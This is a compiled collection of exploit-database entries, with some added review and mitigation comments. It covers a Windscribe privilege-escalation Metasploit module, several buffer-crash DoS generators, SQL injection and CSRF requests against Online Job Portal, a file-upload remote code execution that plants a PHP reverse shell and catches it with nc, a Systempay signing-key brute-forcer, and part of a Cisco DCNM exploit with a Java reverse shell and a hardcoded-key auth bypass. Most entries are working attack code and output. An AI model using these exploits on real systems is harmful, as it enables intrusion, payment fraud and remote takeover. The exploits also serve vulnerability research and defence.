kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00"
kt << [command.force_encoding('UTF-8').codepoints.map { |c| "%04X" % c }.join].pack('H*')
kt << "\x00" * (32_005 - kt.length)

print_status "Sending #{command} to #{pipe} ..."

r = session.railgun.kernel32.CreateFileA(pipe, 'GENERIC_READ | GENERIC_WRITE', 0, nil, 'OPEN_EXISTING', 0, nil)
handle = r['return']

if handle == 0xffffffff # INVALID_HANDLE_VALUE
print_error "Invalid handle. #{pipe} named pipe not found, or already opened"
return false
end

vprint_good("Opended #{pipe}! Proceeding ...")

begin
w = client.railgun.kernel32.WriteFile(handle, kt, kt.length, 4, nil)
if w['return'] == false
return false
end
ensure
session.railgun.kernel32.CloseHandle(handle)
end

true
rescue
false
end

# Reports whether the 'WindscribeService' Windows service is present on the
# session host.
#
# Returns CheckCode::Safe with a message when the service is missing, otherwise
# CheckCode::Detected.
#
# NOTE(review): only the existence of the service is tested; the installed
# Windscribe version is never read. A host running a fixed release (1.82 or
# later, per the module description) therefore also yields Detected, so treat
# this result as "product installed", not "vulnerable".
def check
service = 'WindscribeService'

unless service_exists? service
return CheckCode::Safe("Service '#{service}' does not exist")
end

CheckCode::Detected
end

# Module entry point: aborts unless `check` reports Detected and the session is
# not already SYSTEM, writes a generated executable into base_dir, registers it
# for cleanup, and passes its path to the service's named pipe.
#
# Defender notes:
# - Artifacts: an .exe with a random 8-10 character alphanumeric name in %TEMP%
#   (or the configured WritableDir). Cleanup is registered, so the file may be
#   gone by the time of triage.
# - Detection: a process started under the Windscribe service as SYSTEM from a
#   user-writable directory, and unexpected clients opening
#   \\.\pipe\WindscribeService.
# - Mitigation: upgrade to a release that validates the program name (1.82 or
#   later, per the module description).
def exploit
unless check == CheckCode::Detected
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end

if is_system?
fail_with Failure::BadConfig, 'Session already has SYSTEM privileges'
end

payload_path = "#{base_dir}\\#{Rex::Text.rand_text_alphanumeric(8..10)}.exe"
payload_exe = generate_payload_exe
# NOTE(review): the size printed is that of the encoded payload, not of the executable written.
vprint_status "Writing payload (#{payload.encoded.length} bytes) to #{payload_path} ..."
write_file payload_path, payload_exe
register_file_for_cleanup payload_path

unless write_named_pipe("\\\\.\\pipe\\WindscribeService", payload_path)
fail_with Failure::Unknown, 'Failed to write to pipe'
end
end
end

ELAN Smart-Pad 11.10.15.1 Unquoted Service Path


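ELAN Smart-Pad version 11.10.15.1 suffers from an unquoted service path vulnerability. The ETDService binary path shown below contains a space, is not wrapped in quotes, and the service runs as LocalSystem. Quoting the path in the service configuration removes the ambiguity; the issue is only reachable by an account that can already create files in a parent directory of that path.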


MD5 | 6a42d6e141d7f98f524e551efb6c6e00

#Exploit Title: ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2020-02-05
#Vendor : ELAN Microelectronics
#Vendor Homepage : http://www.emc.com.tw/
#Tested on OS: Windows 10 v1803


#Analyze PoC :
==============


C:\Users\ZwX>sc qc ETDService
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: ETDService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Elantech\ETDService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Elan Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

VIM 8.2 Denial Of Service


VIM version 8.2 suffers from a denial of service vulnerability.


MD5 | 69c2d58121478b3c8b9c4332cbb17ac6

# Exploit Title: Invalid memory access with search command
# Date: 17-12-2019
# Vulnerability: DoS
# Vulnerability Discovery: Dhiraj Mishra
# Vulnerable Version: VIM - Vi IMproved 8.2 (Included patches: 1-131)
# Vendor Homepage: https://www.vim.org/
# References:
https://github.com/vim/vim/commit/98a336dd497d3422e7efeef9f24cc9e25aeb8a49

PoC: vim --clean -e -s -c 'exe "norm /\x80PS"'

AbsoluteTelnet 11.12 Denial Of Service


AbsoluteTelnet version 11.12 suffers from multiple denial of service vulnerabilities.


MD5 | 6064f6c158e5d00cf9ab92263e479571

# Exploit Title: AbsoluteTelnet 11.12 - "license name" Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-02-05
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
# Tested Version: 11.12
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es


#Steps to produce the crash:
#1.- Run python code: AbsoluteTelent 11.12_license_name.py
#2.- Open AbsoluteTelent_license_name.txt and copy content to clipboard
#3.- Open AbsoluteTelnet.exe
#4.- Select "Help"> "Enter License Key"
#5.- In "License Name" paste Clipboard
#6.- Crashed

cod = "\x41" * 2500

f = open('AbsoluteTelent_license_name.txt', 'w')
f.write(cod)
f.close()



# Exploit Title: AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-02-05
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
# Tested Version: 11.12
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

#Steps to produce the crash:
#1.- Run python code: AbsoluteTelnet 11.12_username_ssh2.py
#2.- Open absolutetelnet_username_SSH2.txt and copy content to clipboard
#3.- Open AbsoluteTelnet
#4.- Select "new connection file", "Connection", "SSH2", "Use last username"
#5.- In "username" field paste Clipboard
#6.- Select "OK"
#7.- Crashed

buffer = "\x41" * 1000
f = open ("absolutetelnet_username_SSH2.txt", "w")
f.write(buffer)
f.close()

TapinRadio 2.12.3 Denial Of Service


TapinRadio version 2.12.3 suffers from multiple denial of service vulnerabilities.


MD5 | afbb80304394a18e4dc439cc61953a99

# Exploit Title: TapinRadio 2.12.3 - 'address' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-02-05
# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
# Software Link : http://www.raimersoft.com/downloads/tapinradio_setup_x64.exe
# Tested Version: 2.12.3
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

#Steps to produce the crash:
#1.- Run python code: tapinadio_address.py
#2.- Open tapin_add.txt and copy content to clipboard
#3.- Open TapinRadio
#4.- Select "Settings"> "Preferences"> "Miscellaneous"
#5.- Select "Set Application Proxy..." In "Address" field paste Clipboard
#6.- In Port type "444"> "Username" type "test"> Password type "1234"
#7.- Select "OK" and "OK"
#8.- Crashed

# Test string for the proxy "Address" field described in the steps above:
# 3000 bytes of 0x41 ('A').
# NOTE(review): the crash suggests the proxy settings dialog does not bound
# this field; the page does not show the faulting code.
payload = "\x41" * 3000

# Same output file and mode as before; the context manager closes the handle.
with open('tapin_add.txt', 'w') as out:
    out.write(payload)

# Exploit Title: TapinRadio 2.12.3 - 'username' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-02-05
# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
# Software Link : http://www.raimersoft.com/downloads/tapinradio_setup_x64.exe
# Tested Version: 2.12.3
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

#Steps to produce the crash:
#1.- Run python code: tapinadio_user.py
#2.- Open tapin_user.txt and copy content to clipboard
#3.- Open TapinRadio
#4.- Select "Settings"> "Preferences"> "Miscellaneous"
#5.- Select "Set Application Proxy..." In "Username" field paste Clipboard
#6.- In Server type "1.1.1.1"> Port type 444 > Password type "1234"
#7.- Select "OK" and "OK"
#8.- Crashed

# Test string for the proxy "Username" field described in the steps above:
# 10000 bytes of 0x41 ('A').
# NOTE(review): the crash suggests the proxy settings dialog does not bound
# this field; the page does not show the faulting code.
payload = "\x41" * 10000

# Same output file and mode as before; the context manager closes the handle.
with open('tapin_user.txt', 'w') as out:
    out.write(payload)


RarmaRadio 2.72.4 Denial Of Service


RarmaRadio version 2.72.4 suffers from multiple denial of service vulnerabilities.


MD5 | 9a461b9e26483b54eee8f52ea1c78cdb

# Exploit Title: RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-02-05
# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
# Software Link : http://www.raimersoft.com/downloads/rarmaradio_setup.exe
# Tested Version: 2.72.4
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

#Steps to produce the crash:
#1.- Run python code: rarmaradio_username.py
#2.- Open RarmaRadio2.72.4_username.txt and copy content to clipboard
#3.- Open RarmaRadio
#4.- Select "Edit"> "Settings"> "Network"
#5.- In "Username" field paste Clipboard
#6.- Select "OK"
#7.- Crashed
# Test string for the Network "Username" field described in the steps above:
# 5000 bytes of 0x41 ('A').
# NOTE(review): the crash suggests the settings dialog does not bound this
# field; the page does not show the faulting code.
payload = "\x41" * 5000

# Same output file and mode as before; the context manager closes the handle.
with open("RarmaRadio2.72.4_username.txt", "w") as out:
    out.write(payload)

# Exploit Title: RarmaRadio 2.72.4 - 'server' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 05-02-2020
# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
# Software Link : http://www.raimersoft.com/downloads/rarmaradio_setup.exe
# Tested Version: 2.72.4
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to produce the crash:
#1.- Run python code: RarmaRadio2.72.4_server.py
#2.- Open RarmaRadio2.72.4_server.txt and copy content to clipboard
#3.- Open RarmaRadio
#4.- Select "Edit"> "Settings"> "Network"
#5.- In "Server" field paste Clipboard
#6.- Select "OK"
#7.- Crashed

# Test string for the Network "Server" field described in the steps above:
# 4000 bytes of 0x41 ('A').
# NOTE(review): the crash suggests the settings dialog does not bound this
# field; the page does not show the faulting code.
payload = "\x41" * 4000

# Same output file and mode as before; the context manager closes the handle.
with open("RarmaRadio2.72.4_server.txt", "w") as out:
    out.write(payload)

Online Job Portal 1.0 SQL Injection


Online Job Portal version 1.0 suffers from a remote SQL injection vulnerability.


MD5 | 9838637c46339e8b9870a9befa3cc142

# Exploit Title: Online Job Portal 1.0 - 'user_email' SQL Injection
# Dork: N/A
# Date: 2020-02-06
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: Linux
# CVE: N/A

# POC:
# 1)
#
curl -i -s -k -X $'POST' \
-H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 282' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
--data-binary $'user_email=1\'%20aND%20(SeLeCT%201%20FRoM(SeLeCT%20CoUNT(*),CoNCaT((SeLeCT%20(eLT(2=2,1))),CoNCaT_WS(0x203a20,USeR(),DaTaBaSe(),veRSIoN()),FLooR(RaND(0)*2))x%20FRoM%20INFoRMaTIoN_SCHeMa.PLUGINS%20GRoUP%20BY%20x)a)--%20VerAyari&user_pass=0x5665724179617269&btnLogin=0x5665724179617269' \
$'http://localhost/[PATH]/admin/login.php'
#
HTTP/1.1 200 OK
Date: Wed, 05 Feb 2020 19:18:45 GMT
Server: Apache/2.4.38 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3251
Connection: close
Content-Type: text/html; charset=UTF-8
.............
<!-- /.login-box -->
Failed to get query handle: SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '1root@localhost : exploitdb : 10.1.38-MariaDB1' for key 'group_key'
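#
# Note: the database user, schema name and server version come back inside the PDO error text shown above. The response therefore indicates two separate defects in admin/login.php: user_email reaches the SQL statement without being bound as a parameter, and raw database errors are printed to the client. Binding the value in a prepared statement and logging database errors server-side instead of echoing them addresses both.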

# POC:
# 2)
#
curl -i -s -k -X $'POST' \
-H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 237' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
--data-binary $'USERNAME=1\'%20aND%20(SeLeCT%201%20FRoM(SeLeCT%20CoUNT(*),CoNCaT((SeLeCT%20(eLT(2=2,1))),CoNCaT_WS(0x203a20,USeR(),DaTaBaSe(),veRSIoN()),FLooR(RaND(0)*2))x%20FRoM%20INFoRMaTIoN_SCHeMa.PLUGINS%20GRoUP%20BY%20x)a)--%20verayari&PASS=VerAyari' \
$'http://localhost/[PATH]/process.php?action=login'
#
HTTP/1.1 200 OK
Date: Wed, 05 Feb 2020 19:17:19 GMT
Server: Apache/2.4.38 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 167
Connection: close
Content-Type: text/html; charset=UTF-8

Failed to get query handle: SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '1root@localhost : exploitdb : 10.1.38-MariaDB1' for key 'group_key'
#

Online Job Portal 1.0 Code Execution


Online Job Portal version 1.0 suffers from a code execution vulnerability.


MD5 | 3fdc374f47c53561a411b2492dd1a68c

# Exploit Title: Online Job Portal 1.0 - Remote Code Execution
# Dork: N/A
# Date: 2020-02-06
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: Linux
# CVE: N/A

# POC:
# 1)
#
curl -i -s -k -X $'POST' \
-H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: multipart/form-data; boundary=---------------------------1852293616672951051689730436' -H $'Content-Length: 781' -H $'Referer: http://localhost/[PATH]/admin/user/index.php?view=view' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
--data-binary $'-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"mealid\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\x0d\x0a\x0d\x0a1000000\x0d\x0a-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"photo\"; filename=\"exp.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0aGIF89c;\x0d\x0a<?php $sock = fsockopen(\'192.168.1.104\',6666);\x0d\x0a$descriptorspec = array(\x0d\x0a0 => $sock,\x0d\x0a1 => $sock,\x0d\x0a2 => $sock\x0d\x0a);\x0d\x0a\x0d\x0a$process = proc_open(\'/bin/sh\', $descriptorspec, $pipes);\x0d\x0aproc_close($process);?>\x0d\x0a\x0d\x0a-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"savephoto\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------1852293616672951051689730436--\x0d\x0a' \
$'http://localhost/[PATH]/admin/user/controller.php?action=photos'
#
curl -i -s -k -X $'GET' \
-H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
$'http://localhost/[PATH]/admin/user/photos/exp.php'
#
root@ihsan:~/ExploitDB# nc -nlvp 6666
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Ncat: Connection from 192.168.1.104.
Ncat: Connection from 192.168.1.104:35574.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
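#
# Note: the upload handler accepted a file named exp.php whose only image-like property is a GIF-style first line, and the stored file was then served and executed from /admin/user/photos/. Checking the real content type server-side against an allow-list of image formats, storing uploads under generated names outside the web root, and disabling script execution in the upload directory each break this chain.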

Online Job Portal 1.0 Cross Site Request Forgery


Online Job Portal version 1.0 suffers from a cross site request forgery vulnerability.


MD5 | 4122133ceb4fe8bfe5c2fac3a015180c

# Exploit Title: Online Job Portal 1.0 - Cross Site Request Forgery (Add User)
# Dork: N/A
# Date: 2020-02-06
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: Linux
# CVE: N/A

# POC:
# 1)
# Add User..
#
POST /admin/user/controller.php?action=add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

user_id=1&deptid=&U_NAME=hacker&deptid=&U_USERNAME=hacker&deptid=&U_PASS=hacker&U_ROLE=Administrator&save=
#

# POC:
# 2)
# Edit User..
#
POST /admin/user/controller.php?action=edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

user_id=1&deptid=&U_NAME=hacker_edit&deptid=&U_USERNAME=hacker_edit&deptid=&U_PASS=hacker_edit&U_ROLE=Administrator&save=
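#
# Note: both requests carry only the session cookie and the form fields; no anti-CSRF token appears in either body. A per-session token verified by controller.php before add/edit, together with SameSite session cookies, is the missing control. The account password also travels as a plain form field, so the admin area should only be reachable over TLS.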

Ecommerce Systempay 1.0 Brute Force


Ecommerce Systempay version 1.0 suffers from a production key brute forcing vulnerability.


MD5 | 6baa30a874d05a23a4c74b35021478b2

# Exploit Title: Ecommerce Systempay 1.0 - Production KEY Brute Force
# Author: live3
# Date: 2020-02-05
# Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/
# Software Link: https://paiement.systempay.fr/doc/fr-FR/module-de-paiement-gratuit/
# Tested on: MacOs
# Version: ALL

<?php
/**
*
* INFORMATION
* Exploit Title: Ecommerce Systempay decode secret production KEY / Brute Force
* Author: live3
* Date: 2020-02-05
* Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/
* Tested on: MacOs
* Version: ALL
* Prerequisite: Find a ecommerce who is using Systempay AND SHA1 to crypt signature.
* Put some product on cart and choose systempay for payment method.
* get all data from post sent to https://paiement.systempay.fr/vads-payment/
* keep signature as reference and all vads fields to create new signature.
* Use script to make a brute force on Secret product key (16 char length)
*
* Usage: Once you have the production KEY all modifications on form data will be accepted by systempay ! (You will just generate new signature with your changes)
* You will be able to generate a success payment return !
*
* FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES.
* THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.
*
*/

// Starting candidate for the key search. The script treats the key as a
// 16-character decimal number and counts upward from this value.
// Defender view: a key drawn from at most 10^16 decimal values, checked with a
// single unsalted SHA-1, can be searched offline by anyone who has seen one
// signed form. NOTE(review): the usual remedy is a keyed MAC such as
// HMAC-SHA-256 with a high-entropy key, plus rotating the existing key —
// confirm which signature modes the gateway offers.
$last_key_check = '1000000000000000';

// Working variables: parsed fields, the string that gets hashed, and the
// number of candidates tried per run.
$array_key = array();
$sentence = '';
$how_many_key_to_check_for_loop = 10;

// Reference signature taken from the observed POST data.
// The placeholder below is the SHA-1 of the string "test".
$signature_from_post = 'a94a8fe5ccb19ba61c4c0873d391e987982fbbd3';

// Decoded POST fields, one "name: value" pair per line.
$form_data = '
vads_field_1: VALUE1
vads_field_2: VALUE2
// AND ALL OTHER FIELDS...
';

// Split the pasted block into lines.
$array = explode(PHP_EOL, $form_data);

// Build a name => value map, skipping empty lines.
foreach ($array as $data) {
if ($data != '') {
$elements = explode(': ', $data);
if (!empty($elements)) {
$array_key[trim($elements[0])] = $elements[1];
}
}
}

// Sort by field name so the values are concatenated in a fixed order.
ksort($array_key);

// The hashed message is every field value followed by '+'; the key is
// appended after the last '+' when the hash is computed below.
foreach ($array_key as $value) {
$sentence .= $value . '+';
}


echo 'Signature from POST DATA : '.$signature_from_post.'<br/>';

$found = false;
$get_key = '';

// Compare sha1(message . candidate) with the reference signature, first for
// the starting value and then for the following candidates in the window.
if (sha1($sentence.$last_key_check) != $signature_from_post) {
for ($i = $last_key_check; $i <= $last_key_check+$how_many_key_to_check_for_loop; $i++) {
$get_key = $i;
if (sha1($sentence.$i) == $signature_from_post) {
echo 'Key found : '.$i.'<br/>';
$found = true;
break;
}
}
} else {
$found = true;
}


// Report either the recomputed signature or the last candidate tried.
if ($found) {
$test_sha = sha1($sentence.$get_key);
echo 'Signature calc : '.$test_sha.'<br/><hr/>';
} else {
echo 'Last key check : '.$get_key.'<br/><hr/>';
}


// Print the concatenated field values that were hashed.
echo 'Your sequence : '.$sentence.'<br/>';

Cisco Data Center Network Manager 11.2 Remote Code Execution


Cisco Data Center Network Manager version 11.2 remote code execution exploit.


MD5 | ebfd0aee7d0a59ad770e679268463c0e

#!/usr/bin/python
"""
Cisco Data Center Network Manager SanWS importTS Command Injection Remote Code Execution Vulnerability

Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
- Release: 11.2(1)
- Release Date: 18-Jun-2019
- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip
- Size: 1619.36 MB (1698022100 bytes)
- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5

Bug 1: CVE-2019-15975 / ZDI-20-003
Bug 2: CVE-2019-15979 / ZDI-20-100

Notes:
======

Si.java needs to be compiled against Java 8 (the target used 1.8u201):

import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class Si {
static{
try {
String host = "192.168.100.159";
int port = 1337;
String cmd = "cmd.exe";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host,port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while(!s.isClosed()){
while(pi.available()>0){
so.write(pi.read());
}
while(pe.available()>0){
so.write(pe.read());
}
while(si.available()>0){
po.write(si.read());
}
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}catch (Exception e){}
}
p.destroy();
s.close();
}catch (IOException | InterruptedException e){ }
}
}

Example:
========

1. Modify the above Si.java to contain your connectback ip and port
2. Compile the above Si.java class with Java 8 and store it in an attacker controlled share
3. Launch the poc.py against your target using the share

saturn:~ mr_me$ ./poc.py
(+) usage: ./poc.py <target> <connectback:port> <smbserver> <smbpath>
(+) eg: ./poc.py 192.168.100.122 192.168.100.159:1337 vmware-host '\Shared Folders\tools'

saturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.159:1337 vmware-host '\Shared Folders\tools'
(+) attempting auth bypass 1
(+) bypassed auth! added a global admin hacker:Hacked123
(+) attempting to load class from \\vmware-host\Shared Folders\tools\Si.class
(+) starting handler on port 1337
(+) connection from 192.168.100.122
(+) pop thy shell!
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>whoami
whoami
nt authority\system

C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>
"""

import re
import os
import sys
import time
import base64
import socket
import requests
import calendar
import telnetlib
from uuid import uuid4
from threading import Thread
from Crypto.Cipher import AES
from xml.etree import ElementTree
from datetime import datetime, timedelta
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# AES-CBC helper that reproduces the product's token encryption.
# Defender view: the key is a constant taken from the product and the IV is
# sixteen zero bytes, so equal plaintexts always give equal ciphertexts and
# anyone holding the constant can produce tokens of their own. A token scheme
# needs a per-installation secret and an integrity check (a MAC or an AEAD
# mode); encryption under a shared constant provides neither.
class AESCipher:
def __init__(self):

# Cisco's hardcoded key
self.key = "s91zEQmb305F!90a"
# Block size in bytes, used for padding.
self.bs = 16

def _pad(self, s):
# Pads to a multiple of bs; each pad character encodes the pad length.
return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs)

def encrypt(self, raw):
# Returns base64(AES-CBC(key, zero IV, padded raw)).
raw = self._pad(raw)
iv = "\x00" * 0x10
cipher = AES.new(self.key, AES.MODE_CBC, iv)
return base64.b64encode(cipher.encrypt(raw))

def make_raw_token(target):
""" craft our token """
# The token plaintext is three dash-joined fields: a fixed label, the first 20
# hex characters of a random UUID, and the server time from leak_time().
# None of the fields is a per-user secret. NOTE(review): the server-side token
# check is not shown on this page, so which fields it validates is unknown.
key = "Source Incite"
uuid = str(uuid4()).replace("-","")[0:20]
# Shadows the imported time module inside this function only.
time = leak_time(target)
return "%s-%s-%s" % (key, uuid, time)

def bypass_auth(target, token, usr, pwd):
""" we use this primitive to fully bypass auth """
# Posts a new account with the global-admin role to the REST user-admin
# endpoint, presenting only the self-made token in the afw-token header.
# Returns True when the server reports success or an existing user.
# Defender view: requests to /fm/fmrest/dbadmin/addUser and global-admin
# accounts that nobody provisioned are the traces this step leaves.
global user_added_already
d = {
"userName" : usr,
"password" : pwd,
"roleName" : "global-admin"
}
h = { "afw-token" : token }
uri = "https://%s/fm/fmrest/dbadmin/addUser" % target
